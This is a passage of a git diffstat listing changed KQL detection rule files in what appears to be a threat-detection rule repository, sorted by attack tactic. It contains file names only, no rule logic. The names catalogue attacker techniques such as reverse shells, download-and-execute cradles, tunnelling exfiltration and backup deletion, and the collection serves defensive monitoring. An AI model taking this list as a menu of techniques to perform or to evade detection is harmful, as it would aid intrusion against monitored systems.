.../shell_invocation_via_apt_linux.kql | 20 ++++----- ...ctory_database_snapshot_via_adexplorer.kql | 18 ++++---- .../suspicious_execution_of_hostname.kql | 18 ++++---- .../suspicious_execution_of_systeminfo.kql | 18 ++++---- ..._reconnaissance_activity_using_net_exe.kql | 26 +++++------ .../suspicious_kernel_dump_using_dtrace.kql | 18 ++++---- .../Discovery/suspicious_network_command.kql | 22 +++++----- ...k_connection_to_ip_lookup_service_apis.kql | 22 +++++----- .../suspicious_query_of_machineguid.kql | 18 ++++---- 
...vity_using_get_localgroupmember_cmdlet.kql | 22 +++++----- ...nce_activity_via_gathernetworkinfo_vbs.kql | 18 ++++---- .../Discovery/suspicious_use_of_psloglist.kql | 24 +++++----- .../Discovery/suspicious_where_execution.kql | 22 +++++----- .../Discovery/syskey_registry_keys_access.kql | 18 ++++---- ...ault_driver_altitude_using_findstr_exe.kql | 18 ++++---- .../system_information_discovery.kql | 22 +++++----- ...stem_information_discovery_using_ioreg.kql | 26 +++++------ ...em_information_discovery_using_sw_vers.kql | 22 +++++----- ...mation_discovery_using_system_profiler.kql | 24 +++++----- ...rmation_discovery_via_registry_queries.kql | 22 +++++----- ...stem_integrity_protection_sip_disabled.kql | 18 ++++---- ...m_integrity_protection_sip_enumeration.kql | 22 +++++----- ...em_network_connections_discovery_linux.kql | 22 +++++----- ...em_network_connections_discovery_macos.kql | 22 +++++----- ...work_connections_discovery_via_net_exe.kql | 18 ++++---- .../system_network_discovery_linux.kql | 22 +++++----- .../system_network_discovery_macos.kql | 22 +++++----- ...ction_to_active_directory_web_services.kql | 22 +++++----- ...tem_information_discovery_via_wmic_exe.kql | 24 +++++----- KQL/rules/Discovery/use_of_w32tm_as_timer.kql | 22 +++++----- ...overy_and_export_via_get_aduser_cmdlet.kql | 22 +++++----- .../Discovery/vim_gtfobin_abuse_linux.kql | 20 ++++----- KQL/rules/Discovery/whoami_as_parameter.kql | 18 ++++---- .../whoami_exe_execution_anomaly.kql | 26 +++++------ ...hoami_exe_execution_with_output_option.kql | 18 ++++---- ...ell_cmdlets_execution_proccesscreation.kql | 22 +++++----- ...l_sideloading_from_suspicious_location.kql | 18 ++++---- ...ndows_capability_via_powershell_cmdlet.kql | 22 +++++----- .../adwind_rat_jrat_file_artifact.kql | 18 ++++---- .../application_removed_via_wmic_exe.kql | 18 ++++---- .../application_terminated_via_wmic_exe.kql | 18 ++++---- ...ary_binary_execution_using_gup_utility.kql | 22 +++++----- 
...arbitrary_msi_download_via_devinit_exe.kql | 18 ++++---- ...ommand_execution_via_settingcontent_ms.kql | 18 ++++---- ...sembly_dll_creation_via_aspnetcompiler.kql | 22 +++++----- .../base64_mz_header_in_commandline.kql | 22 +++++----- .../Execution/bash_interactive_shell.kql | 18 ++++---- ...y_proxy_execution_via_dotnet_trace_exe.kql | 22 +++++----- .../bpftrace_unsafe_option_usage.kql | 22 +++++----- ..._exe_from_potentially_suspicious_paths.kql | 18 ++++---- .../capsh_shell_invocation_linux.kql | 18 ++++---- ...wershell_policies_to_an_insecure_level.kql | 22 +++++----- ...eadless_execution_to_mockbin_like_site.kql | 18 ++++---- ...ted_in_a_potential_suspicious_location.kql | 18 ++++---- ...clr_dll_loaded_via_office_applications.kql | 18 ++++---- ...ing_space_characters_execution_anomaly.kql | 20 ++++----- ...cmstp_uac_bypass_via_com_object_access.kql | 22 +++++----- ...ith_suspicious_url_and_appdata_strings.kql | 22 +++++----- ...omputer_password_change_via_ksetup_exe.kql | 18 ++++---- ...conhost_exe_commandline_path_traversal.kql | 22 +++++----- ...ost_spawned_by_uncommon_parent_process.kql | 18 ++++---- ...ion_form_potentially_suspicious_parent.kql | 18 ++++---- ...t_potentially_suspicious_child_process.kql | 24 +++++----- ...pt_uncommon_script_extension_execution.kql | 18 ++++---- .../csexec_service_file_creation.kql | 18 ++++---- ...quest_with_potential_custom_user_agent.kql | 18 ++++---- ...ta_export_from_mssql_table_via_bcp_exe.kql | 24 +++++----- ..._of_powershell_execution_via_sqlps_exe.kql | 24 +++++----- ...mbly_dll_loaded_via_office_application.kql | 18 ++++---- ...nternals_suspicious_powershell_cmdlets.kql | 24 +++++----- .../Execution/enable_bpf_kprobes_tracing.kql | 18 ++++---- ...enable_microsoft_dynamic_data_exchange.kql | 18 ++++---- .../Execution/esxi_vm_kill_via_esxcli.kql | 22 +++++----- .../exchange_powershell_snap_ins_usage.kql | 18 ++++---- .../execute_code_with_pester_bat.kql | 22 +++++----- ...execute_code_with_pester_bat_as_parent.kql 
| 22 +++++----- ..._of_powershell_script_in_public_folder.kql | 22 +++++----- ...ed_in_potentially_suspicious_directory.kql | 18 ++++---- .../file_decryption_using_gpg4win.kql | 18 ++++---- ...file_download_from_ip_url_via_curl_exe.kql | 18 ++++---- ..._via_gpg4win_from_suspicious_locations.kql | 18 ++++---- .../file_encryption_using_gpg4win.kql | 18 ++++---- ...nsion_created_by_an_office_application.kql | 18 ++++---- ...edpaths_from_browser_file_upload_abuse.kql | 18 ++++---- ...process_from_browser_file_upload_abuse.kql | 26 +++++------ .../Execution/forfiles_command_execution.kql | 26 +++++------ .../fsutil_behavior_set_symlinkevaluation.kql | 24 +++++----- ...gac_dll_loaded_via_office_applications.kql | 22 +++++----- .../hacktool_covenant_powershell_launcher.kql | 18 ++++---- .../hacktool_crackmapexec_execution.kql | 18 ++++---- ...ol_crackmapexec_powershell_obfuscation.kql | 18 ++++---- ...rsploit_empire_scheduled_task_creation.kql | 22 +++++----- ...ol_empire_powershell_launch_parameters.kql | 22 +++++----- ...ol_jlaive_in_memory_assembly_execution.kql | 18 ++++---- .../Execution/hacktool_koadic_execution.kql | 18 ++++---- .../Execution/hacktool_pchunter_execution.kql | 22 +++++----- ...ial_impacket_lateral_movement_activity.kql | 18 ++++---- ...l_redmimicry_winnti_playbook_execution.kql | 18 ++++---- ...hacktool_sharpwsus_wsuspendu_execution.kql | 20 ++++----- ...ool_sliver_c2_implant_activity_pattern.kql | 22 +++++----- .../hacktool_stracciatella_execution.kql | 22 +++++----- ...ware_model_reconnaissance_via_wmic_exe.kql | 18 ++++---- ...hidden_powershell_in_link_file_pattern.kql | 22 +++++----- ...mputer_zone_for_http_protocols_via_cli.kql | 18 ++++---- ...om_suspicious_directories_proccreation.kql | 18 ++++---- ...tion_spawn_shell_via_os_system_library.kql | 18 ++++---- ...secure_proxy_doh_transfer_via_curl_exe.kql | 22 +++++----- .../insecure_transfer_via_curl_exe.kql | 22 +++++----- .../installation_of_wsl_kali_linux.kql | 24 +++++----- 
.../interactive_bash_suspicious_children.kql | 22 +++++----- KQL/rules/Execution/jamf_mdm_execution.kql | 22 +++++----- ...mdm_potential_suspicious_child_process.kql | 22 +++++----- .../java_running_with_remote_debugging.kql | 18 ++++---- .../jxa_in_memory_execution_via_osascript.kql | 18 ++++---- ...security_stopped_via_commandline_linux.kql | 24 +++++----- .../Execution/linux_hacktool_execution.kql | 22 +++++----- .../linux_reverse_shell_indicator.kql | 18 ++++---- .../local_file_read_using_curl_exe.kql | 18 ++++---- ...on_user_password_change_via_ksetup_exe.kql | 18 ++++---- ...acos_scripting_interpreter_applescript.kql | 22 +++++----- ...d_powershell_keywords_in_command_lines.kql | 18 ++++---- ...powershell_commandlets_processcreation.kql | 18 ++++---- ...icious_powershell_scripts_filecreation.kql | 18 ++++---- ...l_add_in_loaded_from_uncommon_location.kql | 22 +++++----- ...a_for_outlook_addin_loaded_via_outlook.kql | 22 +++++----- .../Execution/mmc20_lateral_movement.kql | 22 +++++----- ...h_reversed_extensions_using_rtlo_abuse.kql | 24 +++++----- .../mmc_loading_script_engines_dlls.kql | 24 +++++----- .../named_pipe_created_via_mkfifo.kql | 18 ++++---- .../net_webclient_casing_anomalies.kql | 18 ++++---- ...k_connection_initiated_by_eqnedt32_exe.kql | 22 +++++----- ...k_connection_initiated_by_regsvr32_exe.kql | 18 ++++---- .../new_application_in_appcompat.kql | 26 +++++------ .../new_process_created_via_wmic_exe.kql | 18 ++++---- ...l_smart_card_created_via_tpmvscmgr_exe.kql | 22 +++++----- .../nodejs_execution_of_javascript_file.kql | 28 ++++++------ KQL/rules/Execution/nohup_execution.kql | 22 +++++----- ...interactive_powershell_process_spawned.kql | 22 +++++----- ...ted_network_connection_to_non_local_ip.kql | 30 ++++++------- ...erator_bloopers_cobalt_strike_commands.kql | 18 ++++---- ...perator_bloopers_cobalt_strike_modules.kql | 18 ++++---- ...otentially_suspicious_applet_osascript.kql | 18 ++++---- .../osacompile_run_only_execution.kql | 18 
++++---- ...nnection_initiated_by_microsoft_dialer.kql | 26 +++++------ ...eunsafeclientmailrules_setting_enabled.kql | 18 ++++---- ...d_and_decrypted_via_built_in_utilities.kql | 18 ++++---- .../Execution/pcre_net_package_image_load.kql | 18 ++++---- .../Execution/pcre_net_package_temp_files.kql | 18 ++++---- ...oy_remote_adminstartion_tool_execution.kql | 22 +++++----- .../perl_inline_command_execution.kql | 18 ++++---- .../php_inline_command_execution.kql | 18 ++++---- ...rbitrary_command_execution_via_ftp_exe.kql | 18 ++++---- ...arbitrary_file_download_via_cmdl32_exe.kql | 22 +++++----- ...inary_impersonating_sysinternals_tools.kql | 22 +++++----- ...ial_binary_proxy_execution_via_cdb_exe.kql | 22 +++++----- ...al_clickfix_execution_pattern_registry.kql | 28 ++++++------ ...otential_cobaltstrike_process_patterns.kql | 18 ++++---- ...commandline_path_traversal_via_cmd_exe.kql | 22 +++++----- .../potential_cookies_session_hijacking.kql | 18 ++++---- ...tration_activity_via_commandline_tools.kql | 22 +++++----- ...tial_dll_injection_via_acccheckconsole.kql | 26 +++++------ .../potential_dosfuscation_activity.kql | 18 ++++---- ...r_script_execution_via_wscript_cscript.kql | 22 +++++----- ..._spoofing_using_right_to_left_override.kql | 22 +++++----- ...tential_netcat_reverse_shell_execution.kql | 22 +++++----- ...potential_perl_reverse_shell_execution.kql | 22 +++++----- ...etoolboxcmd_exe_vm_state_change_script.kql | 18 ++++---- .../Execution/potential_php_reverse_shell.kql | 20 ++++----- ...al_powershell_command_line_obfuscation.kql | 24 +++++----- ..._powershell_obfuscation_via_wchar_char.kql | 18 ++++---- ...ial_powershell_reverseshell_connection.kql | 22 +++++----- ...duct_class_reconnaissance_via_wmic_exe.kql | 26 +++++------ ...al_product_reconnaissance_via_wmic_exe.kql | 18 ++++---- ...tential_rdp_session_hijacking_activity.kql | 22 +++++----- ...ger_content_execution_via_werfault_exe.kql | 18 ++++---- .../potential_renamed_rundll32_execution.kql | 22 
+++++----- .../potential_ruby_reverse_shell.kql | 18 ++++---- ..._shelldispatch_dll_functionality_abuse.kql | 22 +++++----- ...er_launch_from_document_reader_process.kql | 22 +++++----- ...rvice_path_reconnaissance_via_wmic_exe.kql | 18 ++++---- ...potential_winapi_calls_via_commandline.kql | 22 +++++----- ...l_movement_wmiprvse_spawned_powershell.kql | 26 +++++------ .../potential_xterm_reverse_shell.kql | 18 ++++---- ...child_process_of_clickonce_application.kql | 18 ++++---- ...lly_suspicious_child_process_of_vscode.kql | 22 +++++----- ...suspicious_child_process_of_winrar_exe.kql | 18 ++++---- ...d_executed_via_run_dialog_box_registry.kql | 20 ++++----- ...cious_electron_application_commandline.kql | 22 +++++----- ...uspicious_execution_of_pdqdeployrunner.kql | 22 +++++----- ...file_sharing_domain_via_powershell_exe.kql | 18 ++++---- ...javascript_execution_via_nodejs_binary.kql | 22 +++++----- ...spicious_named_pipe_created_via_mkfifo.kql | 18 ++++---- ...tially_suspicious_webdav_lnk_execution.kql | 18 ++++---- .../powershell_as_a_service_in_registry.kql | 18 ++++---- .../powershell_base64_encoded_iex_cmdlet.kql | 18 ++++---- ...wershell_base64_encoded_invoke_keyword.kql | 18 ++++---- ...ase64_encoded_reflective_assembly_load.kql | 22 +++++----- .../powershell_base64_encoded_wmi_classes.kql | 18 ++++---- ...e_dll_loaded_by_non_powershell_process.kql | 26 +++++------ ...ershell_download_and_execution_cradles.kql | 22 +++++----- .../Execution/powershell_download_pattern.kql | 18 ++++---- ...with_potential_decryption_capabilities.kql | 22 +++++----- ...owershell_inline_execution_from_a_file.kql | 18 ++++---- ...dowsinstaller_com_from_remote_location.kql | 24 +++++----- ...rshell_script_execution_policy_enabled.kql | 22 +++++----- .../powershell_script_run_in_appdata.kql | 22 +++++----- .../process_reconnaissance_via_wmic_exe.kql | 18 ++++---- KQL/rules/Execution/psexec_execution.kql | 22 +++++----- ...hild_process_execution_as_local_system.kql | 22 +++++----- 
.../Execution/psexec_service_execution.kql | 22 +++++----- .../psexec_service_file_creation.kql | 18 ++++---- .../Execution/pua_advancedrun_execution.kql | 18 ++++---- KQL/rules/Execution/pua_nircmd_execution.kql | 22 +++++----- .../pua_nircmd_execution_as_local_system.kql | 22 +++++----- KQL/rules/Execution/pua_nsudo_execution.kql | 22 +++++----- .../pua_radmin_viewer_utility_execution.kql | 18 ++++---- KQL/rules/Execution/pua_runxcmd_execution.kql | 22 +++++----- .../pua_wsudo_suspicious_execution.kql | 18 ++++---- .../python_inline_command_execution.kql | 22 +++++----- ...l_execution_via_pty_and_socket_modules.kql | 18 ++++---- .../python_spawning_pretty_tty_on_windows.kql | 18 ++++---- ...hon_spawning_pretty_tty_via_pty_module.kql | 18 ++++---- .../Execution/query_usage_to_exfil_data.kql | 18 ++++---- .../read_contents_from_stdin_via_cmd_exe.kql | 18 ++++---- ...formance_counter_values_via_lodctr_exe.kql | 22 +++++----- .../remcom_service_file_creation.kql | 18 ++++---- ...with_known_revoked_signing_certificate.kql | 28 ++++++------ ...screenconnect_remote_command_execution.kql | 22 +++++----- ...cess_tool_screenconnect_temporary_file.kql | 24 +++++----- .../remote_dll_load_via_rundll32_exe.kql | 18 ++++---- ...powershell_session_host_process_winrm_.kql | 22 +++++----- .../Execution/renamed_curl_exe_execution.kql | 18 ++++---- .../Execution/renamed_ftp_exe_execution.kql | 18 ++++---- .../renamed_jusched_exe_execution.kql | 18 ++++---- .../renamed_nircmd_exe_execution.kql | 18 ++++---- .../renamed_pingcastle_binary_execution.kql | 18 ++++---- .../renamed_psexec_service_execution.kql | 22 +++++----- .../ruby_inline_command_execution.kql | 18 ++++---- .../scheduled_cron_task_job_linux.kql | 22 +++++----- .../scheduled_cron_task_job_macos.kql | 22 +++++----- ...heduled_task_creation_via_schtasks_exe.kql | 24 +++++----- ...script_event_consumer_spawning_process.kql | 18 ++++---- ...reter_execution_from_suspicious_folder.kql | 18 ++++---- 
.../service_reconnaissance_via_wmic_exe.kql | 24 +++++----- .../service_started_stopped_via_wmic_exe.kql | 18 ++++---- ...type_change_via_powershell_set_service.kql | 22 +++++----- .../service_startuptype_change_via_sc_exe.kql | 22 +++++----- ...on_of_process_located_in_tmp_directory.kql | 18 ++++---- .../shell_execution_via_git_linux.kql | 18 ++++---- .../shell_execution_via_rsync_linux.kql | 22 +++++----- ...shell_invocation_via_env_command_linux.kql | 22 +++++----- .../shell_invocation_via_ssh_linux.kql | 18 ++++---- .../silenttrinity_stager_msbuild_activity.kql | 18 ++++---- ...ent_tools_powershell_session_detection.kql | 24 +++++----- .../start_windows_service_via_net_exe.kql | 22 +++++----- .../successful_account_login_via_wmi.kql | 24 +++++----- ..._binaries_and_scripts_in_public_folder.kql | 22 +++++----- ...ectory_spawned_from_office_application.kql | 18 ++++---- ...suspicious_child_process_of_bginfo_exe.kql | 18 ++++---- ...s_deno_file_written_from_remote_source.kql | 24 +++++----- ...load_and_execute_pattern_via_curl_wget.kql | 30 ++++++------- ...s_electron_application_child_processes.kql | 18 ++++---- ...reflection_assembly_load_function_call.kql | 22 +++++----- ...icious_encoded_powershell_command_line.kql | 18 ++++---- ...cious_execution_location_of_wermgr_exe.kql | 18 ++++---- ...us_execution_of_powershell_with_base64.kql | 18 ++++---- ...th_whitespace_padding_clickfix_filefix.kql | 22 +++++----- ..._characteristics_due_to_missing_fields.kql | 18 ++++---- .../suspicious_file_created_in_perflogs.kql | 22 +++++----- ..._from_file_sharing_domain_via_curl_exe.kql | 18 ++++---- ..._from_file_sharing_domain_via_wget_exe.kql | 18 ++++---- ...ous_file_download_from_ip_via_curl_exe.kql | 18 ++++---- ...ous_file_download_from_ip_via_wget_exe.kql | 18 ++++---- ...le_download_from_ip_via_wget_exe_paths.kql | 18 ++++---- ...tion_from_internet_hosted_webdav_share.kql | 18 ++++---- ...cious_greedy_compression_using_rar_exe.kql | 18 ++++---- 
...icious_installer_package_child_process.kql | 22 +++++----- ...cious_interactive_powershell_as_system.kql | 24 +++++----- ...ious_invocation_of_shell_via_awk_linux.kql | 20 ++++----- ...spicious_invocation_of_shell_via_rsync.kql | 18 ++++---- .../suspicious_java_children_processes.kql | 18 ++++---- ...s_microsoft_office_child_process_macos.kql | 18 ++++---- ...uspicious_mshta_exe_execution_patterns.kql | 18 ++++---- .../Execution/suspicious_nohup_execution.kql | 18 ++++---- .../suspicious_outlook_child_process.kql | 18 ++++---- ...etoolboxcmd_exe_vm_state_change_script.kql | 18 ++++---- ...owershell_download_and_execute_pattern.kql | 22 +++++----- ...us_powershell_encoded_command_patterns.kql | 22 +++++----- ...ious_powershell_iex_execution_patterns.kql | 22 +++++----- ...picious_powershell_parameter_substring.kql | 18 ++++---- .../suspicious_powershell_parent_process.kql | 22 +++++----- ...uspicious_process_created_via_wmic_exe.kql | 18 ++++---- .../Execution/suspicious_program_names.kql | 22 +++++----- ...ious_remote_child_process_from_outlook.kql | 18 ++++---- .../suspicious_runscripthelper_exe.kql | 18 ++++---- .../suspicious_scan_loop_network.kql | 22 +++++----- ...ious_script_execution_from_temp_folder.kql | 22 +++++----- ...cters_in_runmru_registry_path_clickfix.kql | 22 +++++----- ...rs_in_typedpaths_registry_path_filefix.kql | 22 +++++----- ...suspicious_spool_service_child_process.kql | 18 ++++---- ...ious_use_of_csharp_interactive_console.kql | 22 +++++----- ...icious_windowsterminal_child_processes.kql | 22 +++++----- ...ious_wmic_execution_via_office_process.kql | 18 ++++---- .../suspicious_wmiprvse_child_process.kql | 18 ++++---- .../suspicious_wsman_provider_image_loads.kql | 18 ++++---- .../suspicious_zipexec_execution.kql | 18 ++++---- .../Execution/sysprep_on_appdata_folder.kql | 22 +++++----- ...and_volume_reconnaissance_via_wmic_exe.kql | 22 +++++----- .../uac_bypass_using_idiagnostic_profile.kql | 18 ++++---- 
..._bypass_using_idiagnostic_profile_file.kql | 18 ++++---- .../uncommon_child_process_of_bginfo_exe.kql | 18 ++++---- ...uncommon_child_processes_of_sndvol_exe.kql | 18 ++++---- ..._one_time_only_scheduled_task_at_00_00.kql | 22 +++++----- .../unusual_parent_process_for_cmd_exe.kql | 18 ++++---- ...ge_of_web_request_commands_and_cmdlets.kql | 22 +++++----- .../Execution/use_of_fsharp_interpreters.kql | 24 +++++----- KQL/rules/Execution/use_of_openconsole.kql | 22 +++++----- .../Execution/use_of_pcalua_for_execution.kql | 22 +++++----- .../vba_dll_loaded_via_office_application.kql | 22 +++++----- ...pressanykey_arbitrary_binary_execution.kql | 22 +++++----- ...ejstools_pressanykey_renamed_execution.kql | 18 ++++---- .../vmtoolsd_suspicious_child_process.kql | 22 +++++----- ...ix_updates_reconnaissance_via_wmic_exe.kql | 18 ++++---- ...cation_file_write_to_suspicious_folder.kql | 18 ++++---- ...le_file_creation_by_non_system_process.kql | 18 ++++---- .../wmic_remote_command_execution.kql | 18 ++++---- .../Execution/wmiprvse_spawned_a_process.kql | 22 +++++----- .../wmiprvse_wbemcomn_dll_hijack.kql | 18 ++++---- .../wmiprvse_wbemcomn_dll_hijack_file.kql | 18 ++++---- .../wscript_or_cscript_dropper_file.kql | 18 ++++---- .../wscript_shell_run_in_commandline.kql | 22 +++++----- .../Execution/wsl_child_process_anomaly.kql | 18 ++++---- ...process_located_in_suspicious_location.kql | 20 ++++----- ...rectory_structure_export_via_csvde_exe.kql | 18 ++++---- ...ectory_structure_export_via_ldifde_exe.kql | 18 ++++---- ..._download_via_configsecuritypolicy_exe.kql | 22 +++++----- ...n_to_ngrok_tunneling_service_initiated.kql | 26 +++++------ ...ation_to_ngrok_tunneling_service_linux.kql | 22 +++++----- .../disk_image_creation_via_hdiutil_macos.kql | 22 +++++----- ...ltration_and_tunneling_tools_execution.kql | 22 +++++----- .../email_exifiltration_via_powershell.kql | 18 ++++---- ...ports_critical_registry_keys_to_a_file.kql | 22 +++++----- 
.../exports_registry_key_to_a_file.kql | 22 +++++----- ...s_data_exfiltration_by_datasvcutil_exe.kql | 26 +++++------ ...nnection_initiated_to_btunnels_domains.kql | 24 +++++----- ...itiated_to_cloudflared_tunnels_domains.kql | 24 +++++----- ...nection_initiated_to_devtunnels_domain.kql | 22 +++++----- ...etwork_connection_initiated_to_mega_nz.kql | 24 +++++----- ...d_to_visual_studio_code_tunnels_domain.kql | 22 +++++----- ...ted_network_connection_to_ngrok_domain.kql | 26 +++++------ .../Exfiltration/pua_rclone_execution.kql | 18 ++++---- .../pua_restic_backup_tool_execution.kql | 26 +++++------ .../python_webserver_execution_linux.kql | 26 +++++------ .../rclone_config_file_creation.kql | 22 +++++----- .../Exfiltration/split_a_file_into_pieces.kql | 22 +++++----- .../suspicious_curl_file_upload_linux.kql | 22 +++++----- .../suspicious_outbound_smtp_connections.kql | 24 +++++----- ...ous_powershell_mailbox_export_to_share.kql | 18 ++++---- ...cious_redirection_to_local_admin_share.kql | 18 ++++---- ...bdav_client_execution_via_rundll32_exe.kql | 18 ++++---- .../Exfiltration/tap_installer_execution.kql | 22 +++++----- ...bdav_client_execution_via_rundll32_exe.kql | 20 ++++----- .../all_backups_deleted_via_wbadmin_exe.kql | 22 +++++----- KQL/rules/Impact/backup_files_deleted.kql | 22 +++++----- ...onfiguration_tampering_via_bcdedit_exe.kql | 22 +++++----- ...copy_from_volumeshadowcopy_via_cmd_exe.kql | 22 +++++----- KQL/rules/Impact/dd_file_overwrite.kql | 22 +++++----- .../Impact/delete_all_scheduled_tasks.kql | 22 +++++----- .../delete_important_scheduled_task.kql | 22 +++++----- ...eleted_data_overwritten_via_cipher_exe.kql | 22 +++++----- ..._shadow_copies_via_wmi_with_powershell.kql | 18 ++++---- .../disable_important_scheduled_task.kql | 18 ++++---- ...e_recovery_from_backup_via_wbadmin_exe.kql | 20 ++++----- .../group_has_been_deleted_via_groupdel.kql | 22 +++++----- KQL/rules/Impact/history_file_deletion.kql | 22 +++++----- 
.../Impact/linux_crypto_mining_indicators.kql | 22 +++++----- .../linux_crypto_mining_pool_connections.kql | 22 +++++----- ...f_rstrtmgr_dll_by_a_suspicious_process.kql | 26 +++++------ ...of_rstrtmgr_dll_by_an_uncommon_process.kql | 28 ++++++------ ..._communication_with_crypto_mining_pool.kql | 22 +++++----- ...added_to_time_machine_via_tmutil_macos.kql | 24 +++++----- ...or_ca_or_authroot_certificate_to_store.kql | 18 ++++---- .../Impact/portable_gpg_exe_execution.kql | 18 ++++---- .../potential_crypto_mining_activity.kql | 24 +++++----- ...ile_overwrite_via_sysinternals_sdelete.kql | 18 ++++---- ...are_activity_using_legalnotice_message.kql | 18 ++++---- ...potential_secure_deletion_with_sdelete.kql | 24 +++++----- ...ous_change_to_sensitive_critical_files.kql | 22 +++++----- .../registry_disable_system_restore.kql | 18 ++++---- .../Impact/renamed_gpg_exe_execution.kql | 18 ++++---- ...renamed_sysinternals_sdelete_execution.kql | 22 +++++----- ...e_access_via_volume_shadow_copy_backup.kql | 22 +++++----- .../stop_windows_service_via_net_exe.kql | 22 +++++----- ...ws_service_via_powershell_stop_service.kql | 22 +++++----- .../stop_windows_service_via_sc_exe.kql | 22 +++++----- ...ious_creation_txt_file_in_user_desktop.kql | 18 ++++---- .../suspicious_execution_of_shutdown.kql | 18 ++++---- ...cious_execution_of_shutdown_to_log_out.kql | 18 ++++---- .../suspicious_macos_firmware_activity.kql | 22 +++++----- .../Impact/suspicious_reg_add_bitlocker.kql | 22 +++++----- .../Impact/system_shutdown_reboot_macos.kql | 22 +++++----- ...ckup_deletion_attempt_via_tmutil_macos.kql | 24 +++++----- ...chine_backup_disabled_via_tmutil_macos.kql | 24 +++++----- .../user_has_been_deleted_via_userdel.kql | 22 +++++----- ...windows_backup_deleted_via_wbadmin_exe.kql | 26 +++++------ ...very_environment_disabled_via_reagentc.kql | 26 +++++------ .../disk_image_mounting_via_hdiutil_macos.kql | 22 +++++----- .../iso_file_created_within_temp_folders.kql | 22 +++++----- 
..._image_mount_indicator_in_recent_files.kql | 24 +++++----- .../octopus_scanner_malware.kql | 18 ++++---- .../office_macro_file_creation.kql | 22 +++++----- ..._file_creation_from_suspicious_process.kql | 18 ++++---- .../office_macro_file_download.kql | 26 +++++------ .../phishing_pattern_iso_in_archive.kql | 22 +++++----- ...reenconnect_server_web_shell_execution.kql | 22 +++++----- ...sions_via_the_registry_2_vpn_extension.kql | 18 ++++---- .../shell_process_spawned_by_java_exe.kql | 24 +++++----- ...suspicious_browser_child_process_macos.kql | 22 +++++----- ...suspicious_child_process_of_sql_server.kql | 18 ++++---- ...icious_child_process_of_veeam_dabatase.kql | 18 ++++---- ...icious_double_extension_file_execution.kql | 18 ++++---- ...xecution_from_outlook_temporary_folder.kql | 18 ++++---- ...ious_execution_via_macos_script_editor.kql | 18 ++++---- ...created_in_outlook_temporary_directory.kql | 24 +++++----- ..._write_to_sharepoint_layouts_directory.kql | 20 ++++----- .../suspicious_hwp_sub_processes.kql | 18 ++++---- ...ine_padding_with_whitespace_characters.kql | 24 +++++----- ...icious_microsoft_onenote_child_process.kql | 22 +++++----- ...sexchangemailboxreplication_aspx_write.kql | 18 ++++---- ...spicious_processes_spawned_by_java_exe.kql | 24 +++++----- .../suspicious_processes_spawned_by_winrm.kql | 22 +++++----- ...s_shells_spawn_by_java_utility_keytool.kql | 18 ++++---- .../terminal_service_process_spawn.kql | 18 ++++---- ...er_added_to_remote_desktop_users_group.kql | 22 +++++----- ...ows_registry_trust_record_modification.kql | 22 +++++----- ...rom_or_to_admin_share_or_sysvol_folder.kql | 22 +++++----- .../hacktool_sharpmove_tool_execution.kql | 18 ++++---- .../hacktool_winrm_access_via_evil_winrm.kql | 18 ++++---- .../mmc_spawning_windows_shell.kql | 18 ++++---- ...tsc_exe_execution_from_uncommon_parent.kql | 22 +++++----- ...rt_forwarding_rule_added_via_netsh_exe.kql | 24 +++++----- .../new_portproxy_registry_entry_added.kql | 24 +++++----- 
...top_connection_initiated_via_mstsc_exe.kql | 24 +++++----- ...dp_connections_over_non_standard_tools.kql | 24 +++++----- ...nternetexplorer_application_dll_hijack.kql | 18 ++++---- ...orer_application_dll_hijack_image_load.kql | 18 ++++---- ...eral_movement_via_activatemicrosoftapp.kql | 18 ++++---- ...eral_movement_via_windows_remote_shell.kql | 22 +++++----- .../potential_mstsc_shadowing_activity.kql | 18 ++++---- .../potential_remote_desktop_tunneling.kql | 18 ++++---- ...scalation_via_named_pipe_impersonation.kql | 22 +++++----- .../psexec_remote_execution_file_artefact.kql | 22 +++++----- ...rt_forwarding_rule_added_via_netsh_exe.kql | 22 +++++----- .../rundll32_execution_without_parameters.kql | 22 +++++----- .../suspicious_csi_exe_usage.kql | 22 +++++----- .../suspicious_rdp_redirect_using_tscon.kql | 18 ++++---- .../suspicious_sysaidserver_child.kql | 18 ++++---- .../suspicious_ultravnc_execution.kql | 18 ++++---- .../windows_admin_share_mount_via_net_exe.kql | 22 +++++----- ..._hosted_webdav_share_mount_via_net_exe.kql | 18 ++++---- .../windows_share_mount_via_net_exe.kql | 22 +++++----- .../winrs_local_command_execution.kql | 24 +++++----- ...mers_activity_via_scrcons_exe_dll_load.kql | 24 +++++----- .../wmiexec_default_output_file.kql | 22 +++++----- ...sions_to_hide_services_via_set_service.kql | 22 +++++----- ..._windows_security_center_notifications.kql | 18 ++++---- ...ugger_entry_to_aedebug_for_persistence.kql | 22 +++++----- ...ger_entry_to_hangs_key_for_persistence.kql | 22 +++++----- .../add_disallowrun_execution_to_registry.kql | 18 ++++---- .../allow_rdp_remote_assistance_feature.kql | 22 +++++----- KQL/rules/Persistence/change_the_fax_dll.kql | 18 ++++---- ...ccount_associated_with_the_fax_service.kql | 18 ++++---- .../chopper_webshell_process_pattern.kql | 18 ++++---- ...nstance_executed_with_custom_extension.kql | 22 +++++----- .../clickonce_trust_prompt_tampering.kql | 22 +++++----- .../Persistence/com_hijack_via_sdclt.kql | 18 ++++---- 
...nication_to_uncommon_destination_ports.kql | 18 ++++---- .../crashcontrol_crashdump_disabled.kql | 22 +++++----- ..._local_hidden_user_account_by_registry.kql | 18 ++++---- .../creation_of_a_local_user_account.kql | 22 +++++----- ..._internal_tools_or_feature_in_registry.kql | 22 +++++----- ..._windows_security_center_notifications.kql | 18 ++++---- ..._hijackig_via_additional_space_in_path.kql | 20 ++++----- .../dns_over_https_enabled_by_registry.kql | 26 +++++------ .../dropping_of_password_filter_dll.kql | 18 ++++---- .../Persistence/enable_lm_hash_storage.kql | 20 ++++----- .../enable_lm_hash_storage_proccreation.kql | 20 ++++----- ...ing_cor_profiler_environment_variables.kql | 18 ++++---- .../esxi_account_creation_via_esxcli.kql | 22 +++++----- ...mission_assigned_to_account_via_esxcli.kql | 22 +++++----- .../etw_logging_disabled_for_rpcrt4_dll.kql | 18 ++++---- .../etw_logging_disabled_for_scm.kql | 18 ++++---- ...abled_in_net_processes_sysmon_registry.kql | 18 ++++---- .../hacktool_powerup_write_hijack_dll.kql | 26 +++++------ ...acktool_sharpup_privesc_tool_execution.kql | 18 ++++---- .../Persistence/ie_change_domain_zone.kql | 22 +++++----- ..._code_module_command_line_installation.kql | 22 +++++----- .../imports_registry_key_from_a_file.kql | 24 +++++----- .../imports_registry_key_from_an_ads.kql | 18 ++++---- KQL/rules/Persistence/interactive_at_job.kql | 22 +++++----- .../Persistence/linux_webshell_indicators.kql | 22 